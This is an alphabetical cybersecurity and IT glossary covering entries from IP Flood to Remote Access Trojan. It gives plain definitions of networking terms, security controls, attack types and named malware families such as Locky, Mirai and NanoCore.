IP Flood - This is a Denial of Service attack which aims to send a host an avalanche of pings (echo request packets) that the protocol implementation cannot manage. This causes the system to fail and return a denial of service error.



J# - Set of programming tools that allow developers to use the Java programming language to write applications that will run on Microsoft's .

J/Direct - Application programming interface (API) from Microsoft that allows applications written in the Java programming language to make programming requests for Windows operating system services.

J2EE - The Java Platform, Enterprise Edition (Java EE) is a collection of Java APIs owned by Oracle that software developers can use to write server-side applications.

J2ME - J2ME (Java 2 Platform, Micro Edition) is a technology that allows programmers to use the Java programming language and related tools to develop programs for mobile wireless information devices such as cellular phones and personal digital assistants (PDAs).

JAAS - The Java Authentication and Authorization Service (JAAS) is a set of application program interfaces (APIs) that can determine the identity of a user or computer attempting to run Java code, and ensure that the entity has the privilege or permission to execute the functions requested.

Jabber - Initiative to produce an open source, XML-based instant messaging platform.

Jack - A female connector is a connector attached to a wire, cable, or piece of hardware, having one or more recessed holes with electrical terminals inside, and constructed in such a way that a plug with exposed conductors (male connector) can be inserted snugly into it to ensure a reliable physical and electrical connection.

Jad - JAD (Joint Application Development) is a methodology that involves the client or end user in the design and development of an application, through a succession of collaborative workshops called JAD sessions.

Jailbreak - In a mobile device context, jailbreaking is the use of an exploit to remove manufacturer or carrier restrictions from a device such as an iPhone or iPad.

Jam - In an Ethernet network, a jam is a signal from one device to all other devices that a collision has occurred.

Jam Sync - In audio (sound) production, jam sync is a mode of device synchronization using SMPTE time code in which a slave device can furnish its own timing during the time that a master device is temporarily unstable.

Jamcracker Services Delivery Network JSDN - A platform for purchasing and managing public and private cloud computing services.

Janet - In the United Kingdom, JANET (Joint Academic Network) is the main backbone network for the UK university system of academic and research computers.

JAQL json query language - JAQL is a query language for the JavaScript Object Notation (JSON) data interchange format.

JAR file Java Archive - A Java Archive, or JAR file, contains all of the various components that make up a self-contained, executable Java application, deployable Java applet or, most commonly, a Java library to which any Java Runtime Environment can link.

Jargon File New Hacker's Dictionary - The Jargon File is a compilation of computer-related slang that was first developed in 1975 by Raphael Finkel at Stanford University from sources including the Stanford and MIT AI Labs, Carnegie Mellon University and Worcester Polytechnic Institute.

Jitter - Jitter is any deviation in, or displacement of, the signal pulses in a high-frequency digital signal. The aberration can be in amplitude, phase timing, or the width of the signal pulse. Jitter is sometimes referred to as “Packet Delay Variation,” or PDV. Controlling jitter is critical for a good online experience.

Jump Bag - A Jump Bag is a container holding all the items necessary to respond to an incident, kept ready so as to mitigate the effects of a delayed response.



Kernel Level Rootkit - The kernel is the core of the Operating System, and Kernel Level Rootkits are created by adding additional code to, or replacing portions of, the core operating system with modified code via device drivers (in Windows) or Loadable Kernel Modules (Linux). Kernel Level Rootkits can have a serious effect on the stability of the system if the kit’s code contains bugs. Kernel rootkits are difficult to detect because they have the same privileges as the Operating System, and therefore they can intercept or subvert operating system operations.

Keylogger - Software or hardware designed to capture a user's keystrokes on a compromised system. The keystrokes are stored or transmitted so that they may be used to collect valued information.

Keylogging - Through keylogging, cyber criminals can use malicious software to record the keystrokes on a user’s keyboard, without the victim realizing it. This way, cyber criminals can collect information such as passwords, usernames, PIN codes and other confidential data.

Key Management - The procedures and mechanisms for generating, disseminating, replacing, storing, archiving, and destroying cryptographic keys.

Keystroke Interference Software - These programs attempt to trick keyloggers by introducing random keystrokes, although this simply results in the keylogger recording more information than it needs to. An attacker has the task of extracting the keystrokes of interest—the security of this mechanism, specifically how well it stands up to cryptanalysis, is unclear.

Keyword(s) - A word that acts as the key to a cipher or code. Phrases in web content that make it possible for people to find a website via search engines.

Keyword Stuffing - The practice of loading a webpage with keywords or numbers in an attempt to manipulate a site's ranking.

Kovter - Kovter is a Trojan whose primary objective is performing click-fraud operations on the PC it compromises. However, in 2015 Kovter incorporated new cloaking tricks in order to evade detection, which is why cyber criminals started using it to deliver other types of malware, such as ransomware, or to recruit PCs into botnets.



Latency - Latency is the time it takes a frame to get from sender to destination. It is the sum of both processing and propagation delays when traveling through a network device or across the network and back to the test port. In order to measure latency a test frame is transmitted through the network containing a time stamp, and that time stamp is checked when the frame is received.

L2TP - Layer 2 Tunneling Protocol (L2TP) is a VPN technology used to establish secure connections over an insecure medium such as the Internet.

Least Privilege - The principle of giving an individual only the set of privileges that are essential to performing authorized tasks. This principle limits the damage that can result from the accidental, incorrect, or unauthorized use of an information system.

Level of Concern - This is the rating which indicates which protection tactics and processes should be applied to an information system to keep it safe and operating at an optimum level. A level of concern can be basic, medium or high.

Lightweight Directory Access Protocol - LDAP is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network. Directory services play an important role in developing intranet and Internet applications by allowing the sharing of information about users, systems, networks, services, and applications throughout the network.

Likelihood of Occurrence - This defines the probability that a specific threat will exploit a given vulnerability, based on a subjective analysis.

Linux Hosting - A Linux server is a high-powered variant of the Linux open source operating system that's designed to handle the more demanding needs of business applications such as network and system administration, database management and Web services.

Live CD - A live CD is a complete bootable computer installation including operating system which runs directly from a CD-ROM or similar storage device into a computer's memory, rather than loading from a hard disk drive. A Live CD allows users to run an operating system for any purpose without installing it or making any changes to the computer's configuration. Live CDs can run on a computer without secondary storage, such as a hard disk drive, or with a corrupted hard disk drive or file system, allowing data recovery.

Local Area Network LAN - A local-area network (LAN) is a computer network that spans a relatively small area. Most often, a LAN is confined to a single room, building or group of buildings; however, one LAN can be connected to other LANs over any distance via telephone lines and radio waves.

Locky - Locky is a type of encrypting malware distributed through Microsoft Office Macros and targeting Windows-running PCs. The name comes from the fact that, once the victim’s PC is infected, the ransomware will scramble and encrypt all the data on that PC, setting every file extension to .locky. Locky is spread through spam email campaigns, which make heavy use of spoofing, in the same way that the cyber criminals behind Dridex operate. In order to get the data decrypted, Locky creators ask for a ransom, which, if not paid, will leave the data useless if the victim doesn’t have a backup.

Logic Bomb - This is a piece of code that a miscreant can insert into software to trigger a malicious function when a set of defined conditions are met.

Low Impact - This level of impact of a cyber threat or cyber attack on an organization shows that there could be a loss of confidentiality, integrity, or availability, but with limited consequences. This includes reducing the capabilities of the organization, while still retaining the ability to function, but also other minor damages, financial loss or harm to people.



MAC - Media Access Control is a Layer 2 construct in the OSI model. The physical address is coded into the network adapter itself and is designed to be unique.

Macro Virus - A macro virus is a computer virus written in the same macro language used for software programs, including Microsoft Excel or word processors such as Microsoft Word. When a macro virus infects a software application, it causes a sequence of actions to begin automatically when the application is opened.

Magic Cookie - A token or short packet of data passed between communicating programs, where the data is typically not meaningful to the recipient program. The contents are opaque and not usually interpreted until the recipient passes the cookie data back to the sender or perhaps another program at a later time. The cookie is often used like a ticket – to identify a particular event or transaction.

Malicious Code - Application security threat that cannot be efficiently controlled by conventional antivirus software alone. Malicious code describes a broad category of system security terms that includes attack scripts, viruses, worms, Trojan horses, backdoors and malicious active content.

Malware - Malicious software designed to infiltrate or damage a computer system, without the owner's consent. Common forms of malware include computer viruses, worms, Trojans, spyware, and adware.

Malware-as-a-Service - This type of malware is developed by cyber criminals to require little or no expertise in hacking, to be flexible and polymorphic, to offer a broader reach, and it often comes packed with ready-coded targets. Malware-as-a-service can be bought or rented on the deep web and in cyber criminal communities, and sometimes can even include technical support from its makers and their team, which they run as a business. The main purpose behind it is making as much money as possible.

Management Security Control - A security control that focuses on the management of IT security and IT security risks.

Man-in-the-Middle Attack MitM - Through this attack, cyber criminals can change the victim’s web traffic and interpose themselves between the victim and a web-based service the victim is trying to reach. At that point, the attacker can either harvest the information that’s being transmitted via the web or alter it. This type of attack is often abbreviated to MITM, MitM, MIM, MiM or MITMA.

Mantrap - Mantraps prevent “piggybacking” or “tailgating” and ensure only authorized personnel pass through a security entrance one at a time.

Martian Packet - IP packet seen on the public Internet that contains a source or destination address that is reserved for special-use by Internet Assigned Numbers Authority (IANA). On the public Internet, such a packet either has a spoofed source address, and it cannot actually originate as claimed, or the packet cannot be delivered.

Maximum Tolerable Downtime - This refers to the maximum amount of time that organizational processes and activities can be disrupted without causing severe consequences for the organization’s mission.

Mazar BOT - Mazar BOT is a strain of malware targeting Android devices which first emerged in February 2016. The malware spreads through SMSs sent to random numbers, which include a link shortened through a URL shortener service (such as Once clicked, the link installs the Mazar BOT malware on the affected device, gaining the ability to write, send, receive and read SMS, access Internet connections, call phones, erase the phone it’s installed on and more. Mazar BOT doesn’t run on smartphones running Android with the Russian language option. Spoofing has also been observed in Mazar BOT attacks.

MD5 - MD5 is a hashing algorithm that creates a fixed-length output, referred to as a hash or message digest. In the PKI world, SHA and MD5 are the most popular mechanisms for creating thumbprints for digital certificates.

Medical Identity Theft - The theft of personal information in order to obtain medical care, pharmaceutical services or even insurance coverage. As a result, erroneous entries may be placed into the victim's existing medical records and impact the health care or insurance coverage of the victim.

Metadata - Data about Data. Metadata is defined as the data providing information about one or more aspects of the data; it is used to summarize basic information about data which can make tracking and working with specific data easier. Metadata helps users find relevant information and discover resources. It also helps organize electronic resources, provide digital identification, and archive and preserve resources. Metadata allows users to access resources through "allowing resources to be found by relevant criteria, identifying resources, bringing similar resources together, distinguishing dissimilar resources, and giving location information." Metadata of telecommunication activities including Internet traffic is very widely collected by various national governmental organizations. This data is used for the purposes of traffic analysis and can be used for mass surveillance.

Microsoft Forefront Endpoint Security - Microsoft Forefront Endpoint Security refers to an enterprise-grade line of security products offered by Microsoft in its security software product line. In 2012, Microsoft released the final version of Forefront Endpoint Security as "Microsoft System Center 2012 Endpoint Protection."

Microsoft Endpoint Essentials - Microsoft Security Essentials is a free anti-malware tool available for Microsoft's Windows Vista and Windows 7 operating systems that is designed to protect computers from viruses, spyware and other forms of malware.

Microsoft Security Software - Microsoft provides a variety of security options to protect users of its Windows-based operating systems and software products from malware, viruses, hacking attempts, phishing attacks, spam and more. The most popular among Microsoft's standalone software security options are Windows Defender, Microsoft Security Essentials, Microsoft Safety Scanner and Forefront Endpoint Security.

Mirai - Mirai is a malware botnet known to compromise Internet of Things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.

Mobile Code - This is a type of software that can be transferred between systems (across a network) and which can also be executed on a local system, such as a computer, without the recipient’s explicit consent. Here are some examples of mobile code that you may come across: JavaScript, VBScript, Flash animations, Shockwave movies, Java applets, ActiveX controls and even macros embedded in Microsoft Office or Excel documents.

Mobile Phone Malware - This type of malware targets mobile phones, tablets and other mobile devices, and it aims to disrupt their normal functions, cause system damage or data leakage and/or data loss.

Mobile Security - Mobile security involves protecting both personal and business information stored on and transmitted from smartphones, tablets, laptops and other mobile devices. The term mobile security is a broad one that covers everything from protecting mobile devices from malware threats to reducing risks and securing mobile devices and their data in the case of theft, unauthorized access or accidental loss of the mobile device.

Mobile Security Management - Mobile security management is a term that's often used interchangeably with the more common Mobile Device Management (MDM). Both terms refer to mobile security best practices and mobile security solutions that monitor, manage and secure the mobile devices used in an enterprise.

Moderate Impact - When this type of impact is estimated or observed on an information system, it means that confidentiality, integrity, or availability have suffered a significant blow. The organization may record barely working primary functions and significant damage to its assets, finances and individuals.

Multifactor Authentication - This type of authentication uses two or more factors to achieve authentication. These factors can include: something the user knows (a password or a PIN), something the user has (an authentication token, an SMS with a code or a code generator on the phone/tablet) and/or something the user is (biometric authentication methods, such as fingerprints or retina scans).



Name Service Switch - The Name Service Switch (NSS) is a facility in Unix-like operating systems that provides a variety of sources for common configuration databases and name resolution mechanisms. These sources include local operating system files (such as /etc/passwd, /etc/group, and /etc/hosts), Domain Name System (DNS), Network Information Service (NIS), and LDAP.

NanoCore - NanoCore is a Remote Access Trojan spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.

Nation-State Threat Actor - Government sponsored group that forcefully targets and gains illicit access to the networks of other governments or to industry groups to steal, damage, and/or change information.

Netiquette - Netiquette (short for network etiquette) is a collection of best practices and things to avoid when using the Internet, especially in communities such as forums or online groups. This is more of a set of social conventions that aim to make online interactions constructive, positive and useful. Examples include: posting off-topic, insulting people, sending or posting spam, etc.

Network Basic Input Output System NetBIOS - An API that augments the DOS BIOS by adding special functions for local-area networks (LANs). Almost all Windows-based LANs for PCs are based on NetBIOS. Some LAN manufacturers have even extended it, adding additional network capabilities.

Network Information Service - The Network Information Service (NIS) is a client–server directory service protocol for distributing system configuration data such as user and host names between computers on a computer network.

Network Monitor - Network monitors (also known as reverse-firewalls) can be used to alert the user whenever an application attempts to make a network connection. This gives the user the chance to prevent the keylogger from "phoning home" with his or her typed information.

Network Monitoring - Network monitoring is the use of a system that constantly monitors a computer network for slow or failing components and that notifies the network administrator in case of outages or other trouble. Network monitoring is part of network management.

Network Security Zone - A networking environment with a well-defined boundary, a Network Security Zone Authority, and a standard level of weakness to network threats. Types of Zones are distinguished by security requirements for interfaces, traffic control, data protection, host configuration control, and network configuration control.

Network Sniffing - This is a technique that uses a software program to monitor and analyze network traffic. This can be used legitimately, to detect problems and keep an efficient data flow. But it can also be used maliciously, to harvest data that’s transmitted over a network.

.Net SQL Injection - SQL injection in .NET continues to be one of the most prevalent threats to websites and applications. A .NET SQL injection is a security weakness in a .NET application that lets hackers take control of the software’s database by tricking the application into sending unauthorized SQL commands.

Network Zone - A networking environment with a well-defined boundary, a Network Security Zone Authority, and a standard level of weakness to network threats. Types of Zones are distinguished by security requirements for interfaces, traffic control, data protection, host configuration control, and network configuration control.

Neutrino - Neutrino is a famous exploit kit which has been constantly evolving since it first appeared in 2013. This exploit kit rose to fame because of its user friendly features and low entry barrier to using it. Neutrino includes a user-friendly control panel, continuous monitoring of antivirus detection rates, infostealer capabilities, recommendations of which exploits to use and more. Neutrino is a tool often used to compromise PCs and deliver different types of malware, and is itself delivered through malvertising campaigns and web injects. Neutrino is also available through the exploit kit-as-a-service model, where attackers can rent the exploit kit and increase their profits with smaller investments.

NIDS - A network intrusion detection system (NIDS) is installed at the network level and detects attacks at that level. Unlike a network-based intrusion prevention system (NIPS), an NIDS cannot stop an attack, but it can detect and report the attack to an administrator so that appropriate actions can be taken.

NIPS - A network-based intrusion prevention system (NIPS) is a system used to monitor a network as well as protect the confidentiality, integrity, and availability of a network. Its main functions include protecting the network from threats, such as denial of service (DoS) and unauthorized usage.

Node - A connection point that can receive, create, store, or send data along distributed network routes. Each network node, whether it's an endpoint for data transmissions or a redistribution point, has either a programmed or engineered capability to recognize, process, and forward transmissions to other network nodes.

Non-Repudiation - This refers to a system’s ability to prove that a specific user (and that user alone) sent a message, and that the message hasn’t been modified in any way.

Novel - Is not known or not an obvious derivative of an existing way of doing things.

Nuclear Exploit Kit - Nuclear is a highly effective exploit kit which appeared in 2010 and gave cyber criminals the opportunity to exploit a wide range of software vulnerabilities in applications such as Flash, Silverlight, PDF reader, Internet Explorer and more. Polymorphic in nature, Nuclear advanced over the years into a notorious tool used for launching Zero Day attacks, spreading ransomware or for data exfiltration operations. Nuclear was often used in high-volume compromises and gave attackers the possibility to customize their attacks to specific locations and computer configurations. This constantly evolving exploit kit features various obfuscation tactics in order to avoid being detected by traditional anti-virus and anti-malware solutions.



Obfuscation - In cyber security, obfuscation is a tactic used to make computer code obscure or unclear, so that humans or certain security programs (such as traditional antivirus) can’t understand it. By using obfuscated code, cyber criminals make it more difficult for cyber security specialists to read, analyze and reverse engineer their malware, preventing them from finding a way to block the malware and suppress the threat.

OCSP - The Online Certificate Status Protocol is an Internet protocol used for obtaining the revocation status of an X.509 digital certificate. It is described in RFC 6960 and is on the Internet standards track.

Offline Attack - This type of attack can happen when an attacker manages to gain access to data through offline means, such as eavesdropping, by penetrating a system and stealing confidential information or looking over someone’s shoulder and obtaining credentials to secret data.

On-Screen Keyboard - Most on-screen keyboards (such as the on-screen keyboard that comes with Windows XP) send normal keyboard event messages to the external target program to type text. Software key loggers can log these typed characters sent from one program to another. Additionally, keylogging software can take screenshots of what is displayed on the screen (periodically, and/or upon each mouse click), which means that although certainly a useful security measure, an on-screen keyboard will not protect from all keyloggers.

One Time Passwords - Using one-time passwords may be keylogger-safe, as each password is invalidated as soon as it is used. This solution may be useful for someone using a public computer. However, an attacker who has remote control over such a computer can simply wait for the victim to enter his/her credentials before performing unauthorised transactions on their behalf while their session is active.

Open-Source Intelligence - Open-source intelligence is data collected from publicly available sources to be used in an intelligence context. In the intelligence community, the term "open" refers to overt, publicly available sources. It is not related to open-source software or collective intelligence.

OpenVPN - OpenVPN is a virtual private network system that implements techniques to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities. It implements both client and server applications.

Operational Security Control - A security control primarily implemented and executed by people and typically supported by the use of technology (e.g. supporting software).

Operation Tovar - Operation Tovar was an international, collaborative effort undertaken by law enforcement agencies and private security companies from multiple countries. The operation’s main objective was to take down the Zeus GameOver botnet, which was believed to be used for distributing the CryptoLocker ransomware. Heimdal Security was also involved in this effort, alongside the U.S. Department of Justice, Europol, the FBI, Microsoft, Symantec, Sophos, Trend Micro and more.

OSI Protocols - OSI protocols are a family of standards for information exchange. These were developed and designed by the International Organization for Standardization (ISO). In 1977 the ISO model was introduced, which consisted of seven different layers. This model has been criticized because of its technicality and limited features. The OSI protocol stack works in a hierarchical form, from the hardware physical layer to the software application layer. There are a total of seven layers. Each layer receives data and information from the layer above it.

Outside Threat - This refers to an unauthorized person from outside the company’s security perimeter who has the capacity to harm an information system by destroying it, modifying or stealing data from it and disclosing it to unauthorized recipients, and/or causing denial of service.

Overwrite - To write or copy new data over existing data. The data that was overwritten cannot be retrieved.



Packet Forwarding - Packet forwarding is the relaying of packets from one network segment to another by nodes in a computer network. The network layer in the OSI model is responsible for packet forwarding.

Packet Sniffer - Software (or a hardware device) that captures and records traffic on a network. It has legitimate uses, such as running diagnostics and troubleshooting problems, but it can equally be used to spy on private data exchanges: browsing history, downloads, who you e-mail, and anything else that crosses the wire unencrypted.

Parasite Hosting - Parasite hosting is a search engine optimization (SEO) technique that involves posting a free blog, wiki or forum on a highly respected domain with a high page rank. These free posts are used to create backlinks to a given site, which may boost that site’s search engine page rank, thanks to the host’s high rank.

Parasitic Viruses - A virus that attaches itself to, or inserts itself into, an existing executable file. To remain undetected it hands control back to the host program after running, so the program appears to work normally and the operating system keeps granting it its usual rights. This lets the virus copy itself into other files, install itself in memory or make other malicious changes to the infected PC. Although this type of virus dates from the early history of computer infections, it has made a comeback.

Passive Attack - An attack in which the attacker tries to gain unauthorized access to confidential information by observing rather than acting, for example by sniffing traffic or analysing traffic patterns. It is called passive because the attacker only extracts information without altering any data, which makes it harder to detect; encryption of data in transit is the main defence.

Password - A knowledge factor, that is, "something you know". Passwords are the simplest and most widely used form of authentication and count as a single factor; on their own they are vulnerable to guessing, phishing and reuse across sites, which is why sensitive access combines them with a second factor.

Password Manager - A password manager assists in generating and retrieving complex passwords, potentially storing such passwords in an encrypted database or calculating them on demand.

Password Sniffing - A tactic used by cyber criminals to harvest passwords by monitoring network traffic and extracting the credentials it carries. If a password travels over an unencrypted connection (for example, a login form on a site that is not served over HTTPS), it is readable to anyone on the path between you and the server, which is why credentials must only ever be sent over TLS.

Patch - A patch is a small software update released by manufacturers to fix or improve a software program. A patch can fix security vulnerabilities or other bugs, or enhance the software in terms of features, usability and performance.

Patch Management - This refers to the activity of getting, testing and installing software patches for a network and the systems in it. Patch management includes applying patches both for security purposes and for improving the software programs used in the network and the systems within it.

Patching - The act of applying a patch, which is designed to fix or enhance a software program. This includes both security-related updates and improvements in terms of software features and user experience.

Payload - In cyber security, the payload is the part of a piece of malware that performs the malicious action once it reaches the affected device or network, as opposed to the code that merely delivers it. The payload embodies the attacker's objective, such as stealing financial information, destroying data or encrypting the data on the affected device/network; when you consider a malware's damaging consequences, you are talking about its payload.

Penetration - In cyber security, penetration occurs when a malicious attacker manages to bypass a system’s defenses and acquire confidential data from that system.

Penetration Testing - An authorized, simulated attack launched against a network or computer system in order to identify security vulnerabilities that could be used to gain unauthorized access to its functionality and data. Penetration testing helps companies find and fix weaknesses before a real attacker exploits them.

Perimeter - The boundary between two network security zones through which traffic is routed.

Persistent Cookie - A persistent cookie is a cookie stored on disk with an explicit expiry date, so it survives closing the browser and is sent back to the site on future visits. It lets websites remember user preferences, settings and identity, which makes returning visits faster and more convenient; the same persistence also means a stolen persistent cookie stays useful to an attacker for longer than a session cookie would.

Personal Firewall - A firewall that is installed on and runs on a personal computer, controlling that machine's incoming and outgoing connections according to a set of rules. A firewall in general is a network security system designed to prevent unauthorized access to public or private networks by controlling communication based on a rule set.

Personally Identifiable Information - Personally identifiable information (PII) is any information or data that can be used to discover or distinguish an individual's identity and specific details about the individual.

Phase-shift Keying - Phase-shift keying (PSK) is a digital modulation process which conveys data by changing (modulating) the phase of a constant frequency reference signal (the carrier wave). The modulation is accomplished by varying the sine and cosine inputs at a precise time. It is widely used for wireless LANs, RFID and Bluetooth communication.

Pharming - An online scam aimed at extracting credentials such as usernames and passwords from the victim by redirecting Internet traffic from a legitimate website to a fake one, where victims enter their confidential information and attackers collect it. The redirect is typically achieved by poisoning a DNS resolver's cache or by tampering with the victim's hosts file or home router, so even when the victim types the correct URL the browser lands on the attacker-operated site; this is what makes pharming hard to detect. Such attacks usually target banking and e-commerce websites, and a certificate warning in the browser is often the only visible sign.

Phishing - Phishing is a malicious technique used by cyber criminals to gather sensitive information (credit card data, usernames and passwords, etc.) from users. The attackers pretend to be a trustworthy entity to bait the victims into trusting them and revealing their confidential data. The data gathered through phishing can be used for financial theft, identity theft, to gain unauthorized access to the victim’s accounts or to accounts they have access to, to blackmail the victim and more.

Phishing Simulations - Phishing simulations involve a company sending internal phishing emails containing attachments, embedded links, and requests for personal information to its own employees. The phishing simulations are designed to look like they’re coming from a stranger or from someone the employee knows. If an employee takes the bait, they are notified and either educated or reprimanded.

Phreaking - Phreak is a slang term for hacking telephone networks and devices. It's a verb, as in "to phreak," or "phreaking." A person who phreaks is identified as a "phreak" or "phreaker." The word combines the words "freak" (meaning "aberration," or "enthusiast") and "phone." Usually, a phreak illegally manipulates a telephone system to make free calls, circumventing long-distance or international telephone fees. Phreaking began in the late 1950s with the advent of automated telephone switching.

Physical Penetration Testing - Physical Penetration Testing refers to identifying and exploiting the physical security of an organization in order to obtain valuable insights for correcting weaknesses in the company’s security programs and protocols. Physical security can be defined as protecting personnel, software, hardware, networks and data from physical actions and events that could result in loss or damage to an organization.

PKI - Public-key infrastructure is a system designed to control the distribution of keys and the management (issuance, validation and revocation) of digital certificates.

Plaintext - In cryptography, plaintext is unencrypted information, typically the input to an encryption algorithm (or the output of decryption). The term is also used for data that is transmitted or stored without encryption.

Plain Old Telephone Service POTS - Short for plain old telephone service, the standard analogue telephone service that most homes use. Telephone services based on high-speed digital lines, such as ISDN, are not POTS. The main distinctions between POTS and non-POTS services are speed and bandwidth: data over POTS with a dial-up modem is limited to roughly 56 Kbps (56,000 bits per second) nominally, and closer to 53 Kbps in practice.

Point of Presence - An access point, location, or facility at which two or more different networks or communication devices connect with each other and the Internet. Also referred to as PoP.

Polymorphic Code - Polymorphic code is capable of mutating and changing while maintaining the initial algorithm. Each time it runs, the code morphs, but keeps its function. This tactic is usually used by malware creators to keep their attacks covert and undetected by reactive security solutions.

Polymorphic Engine - A polymorphic engine is used to generate polymorphic malware. This is a computer program capable of transforming a program in derivative versions (different versions of code), but which perform the same function. Polymorphic engines rely on encryption and obfuscation to work, and are used almost exclusively by malware creators and other cyber criminals. Using this type of engine, malicious hackers can create malware types that can’t be detected by antivirus engines or have a very low detection rate.

Polymorphic Malware - Polymorphic malware transforms itself into derivative versions that differ in code but perform the same function and pursue the same objective. By obfuscating and constantly changing its code, a polymorphic strain can infect information systems without being detected by signature-based solutions such as traditional antivirus, which is a key asset from the cyber criminal's perspective.

Polymorphic Packer - A packer is a tool that compresses or encrypts an executable and prepends a small stub that unpacks it in memory at run time, so the original code never appears on disk. A polymorphic packer additionally varies the stub and the encryption key with every sample it produces, so the packed files (for example the attachments of one malicious e-mail campaign) keep changing over time and remain undetected by traditional signature-based solutions for longer.

Pop-Up Ads - Pop-up ads are windows used in advertising. They appear on top of your browser window when you are on a website, and they are often annoying because they are intrusive. While they are not malicious by nature, they can carry malware if a cyber attacker compromises the advertising network that serves the pop-up (malvertising).

Port 443 - TCP port 443 is the standard port for HTTPS, that is, HTTP carried over TLS (historically SSL). When you open a website whose address begins with https://, your browser connects to port 443 on the server.

Potential Impact - When a cyber security risk is assessed, the loss of the 3 essential factors is considered: confidentiality, integrity and availability. If a risk becomes a cyber attack, it can have low, moderate or high impact.

Potentially Unwanted Application PUA - An application you might install on your devices that is not malicious by nature but behaves in ways you did not ask for: bundling adware, installing toolbars, changing browser settings or having an unclear purpose. Such applications carry the risk of turning malicious (for instance through updates or the advertising they load), so users should weigh the risks before installing them.

Poweliks - Poweliks is a Trojan designed to perform click-fraud operations on the affected PC. Its specific character is given by the fact that it’s a type of fileless malware, which makes it very difficult to be detected by traditional, signature-based anti-malware and antivirus solutions. Poweliks installs itself in the Windows registry, where it can inject itself into essential Windows functions. This also helps Poweliks achieve persistence on the infected PC. This malware can be used to also download other threats onto the victim’s PC, such as ransomware delivered through malvertising.

Power Surge - A power surge is a brief, large spike in the current of an electrical system. It lasts only a fraction of a second but can permanently damage outlets and plugged-in equipment by overloading the circuits connected to the system.

Power Virus - This type of computer virus is capable of executing a specific code that triggers the maximum CPU power dissipation (heat generated by the central processing units). Consequently, the computer’s cooling ability would be impaired and the virus could cause the system to overheat. One of the potential effects is permanent physical damage to the hardware. Power viruses are used both by good actors, to test components, but can also be used by cyber criminals.

Pre-Commercial - A product, technology or method that has not entered the marketplace yet.

Primary DNS - A primary (or master) DNS server is the authoritative server that holds the writable copy of a zone file, the set of DNS records mapping a domain's hostnames to IP addresses. Changes to the zone are made on the primary and propagated to secondary servers by zone transfer. The server a browser, application or device first contacts to translate a hostname is not the primary but the recursive resolver, which in turn queries the authoritative servers.

Privileged Access Management PAM - Cybersecurity strategies and technologies for exerting control over the elevated (“privileged”) access and permissions for users, accounts, processes, and systems across an IT environment. By dialing in the appropriate level of privileged access controls, PAM helps organizations condense their organization’s attack surface, and prevent, or at least mitigate, the damage arising from external attacks as well as from insider malfeasance or negligence.

Privilege Escalation Attacks - Act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

Procurement - Process of obtaining goods and services that includes the determination of requirements and acquisition from a supply system or by purchase from the trade.

Proof-of-Concept - Realization of a certain method or idea in order to demonstrate its feasibility, or a demonstration in principle with the aim of verifying that some concept or theory has practical potential.

Proprietary Information PROPIN - Proprietary information is made of all the data that is unique to a company and ensures its ability to stay competitive. This can include customer details, technical information, costs and trade secrets. If cyber criminals compromise or reveal this information, the impact on the company can be quite severe, as we’ve seen in major data breaches.

Protocol - Protocol, in computer science, a set of rules or procedures for transmitting data between electronic devices, such as computers. In order for computers to exchange information, there must be a preexisting agreement as to how the information will be structured and how each side will send and receive it.

Protocol Stack - The protocol stack or network stack is an implementation of a computer networking protocol suite or protocol family. Some of these terms are used interchangeably but strictly speaking, the suite is the definition of the communication protocols, and the stack is the software implementation of them.

Prototype - A first, typical or preliminary model of something, especially a machine, from which other forms are developed or copied.

Proposal - An offer, submitted in response to a request from a contracting authority, which constitutes a solution to the problem, requirement or objective in the request.

Proxy Server - A proxy server is an intermediary that sits between a client and the Internet and makes requests on the client's behalf. Proxies improve security by hiding the internal addresses of a private network from outside hosts, by enforcing policy on outbound traffic (URL filtering, logging, malware scanning) and, in reverse-proxy form, by shielding internal servers from direct exposure; they do not make the client itself immune to attack.

Psychological Manipulation - Influence through mental distortion, emotional exploitation.

Pushdo - Pushdo is a botnet that has been active since 2007 and operates as a service for malware and spam distribution. Pushdo is known to distribute the Cutwail spambot. The malware uses encrypted communication channels and domain generation algorithms so that its zombie hosts can keep locating the servers that send them instructions even when known control domains are taken down.



Qaz - W32.HLLW.Qaz.A was first discovered in China in July 2000. It is a companion virus that can spread over a network. It also has a "backdoor" that will enable a remote user to connect to and control the computer using port 7597.

Quantum Computing - A quantum computer works with qubits that can be placed in superpositions of one and zero, whereas a classical computer works only with ones and zeros. This does not make every computation faster, but for certain problems quantum algorithms offer a dramatic speed-up. The one that matters most for security is Shor's algorithm, which would factor large integers and compute discrete logarithms efficiently and so break RSA and elliptic-curve cryptography; this is why post-quantum (quantum-resistant) algorithms are being standardized and deployed ahead of any such machine.



Ransomware - A type of malware that denies a user's access to a system or data until a sum of money is paid.

Real-time Reaction - This is a type of immediate reaction and response to a spotted compromise attempt. This is done in due time so the victim can ensure protection against unauthorized network access.

Reconnaissance - Activity conducted by a threat actor to obtain information and identify vulnerabilities to facilitate future compromise(s).

Recursive DNS - A recursive DNS server (resolver) is the server that receives a hostname lookup from a user's browser, application or device, queries the authoritative DNS servers on the user's behalf, caches the answer and returns the associated IP address.

Redaction - A form of data sanitization for selected data-file elements (not to be confused with media sanitization, which addresses all data on media).

Reflection Denial of Service - Reflection denial-of-service attacks make use of legitimate third-party servers (the reflectors) to send the attack traffic to a victim, which hides the attacker's own identity. The attacker sends requests to the reflectors with the source IP address spoofed to the victim's, so the reflectors' responses go to the victim and overwhelm it; when the responses are much larger than the requests (as with DNS or NTP), the attack is also an amplification attack.

Remote Access - This happens when someone uses a dedicated program to access a computer from a remote location. This is a norm for people who travel a lot and need access to their company’s network. But cyber criminals can also use remote access to control a computer they’ve previously hacked into.

Remote Access Trojan RAT - A Remote Access Trojan infects a computer and gives cyber attackers remote control of it with the victim's own access permissions, including unrestricted access to the data on the PC. Cyber criminals use RATs to exfiltrate confidential information to servers and websites under their control; RATs include backdoors into the system, can enlist the PC into a botnet and can spread to other devices. Because a RAT operates inside the victim's already authenticated session, it can reach sensitive applications even where strong authentication is in place.

